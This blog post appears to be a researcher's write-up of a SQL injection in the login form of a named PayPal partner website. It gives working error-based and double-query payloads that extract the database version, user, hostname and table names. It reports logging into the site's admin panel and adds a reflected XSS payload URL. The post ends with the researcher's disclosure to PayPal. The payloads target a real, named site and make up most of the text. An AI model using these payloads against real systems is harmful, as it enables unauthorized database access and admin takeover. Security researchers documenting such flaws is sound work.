Paypal Partner SQL Injection

One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.

[code language=”sql”]
LoginForm[email]=-1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]

View post on imgur.com

As we cannot continue with the above error, double query injection works perfectly.

[code language=”sql”]
LoginForm[email]=1′ and(select 1 from(select count(*),concat((select
(select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]

[code language=”sql”]
LoginForm[email]=1′ or 1 GROUP BY concat_ws(‘ :: ‘,version(),
user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or
1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]

View post on imgur.com

However, dumping the database was quite easy since there were no WAFs or any kind of filtering happening. Out of the tables let’s check out the admin table.

[code language=”sql”]
LoginForm[email]=1′ or (@:=1)||@ group by concat((select substr
(group_concat(‘ :: ‘,table_name),1,450) from information_schema.tables
WHERE table_schema=database()),@:=@-1)having @||min(@:=0)%23&LoginForm
[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]

View post on imgur.com

So Finally I was able to log into their admin panel 😉

View post on imgur.com

That’s not all there is also a reflected XSS.
[code language=”text”]http://ppinvoice.com/index.php/faq/faqlist?id=4?><svg/onload=”prompt(‘Hello There’)”>[/code]

View post on imgur.com

It states about Cisco too in Copyright.

View post on imgur.com

However, I reported Paypal and they said it’s out of scope. Well, I recently saw another researcher who had found some issues in another Paypal Partner website running SILK software was accepted while mine was not. The issue seems to be in SILK software. It seems like they are a third party to Paypal. They are also a Magento Solution Provider according their webpage.

2 thoughts on “Paypal Partner SQL Injection

Leave a Reply to KasperCancel reply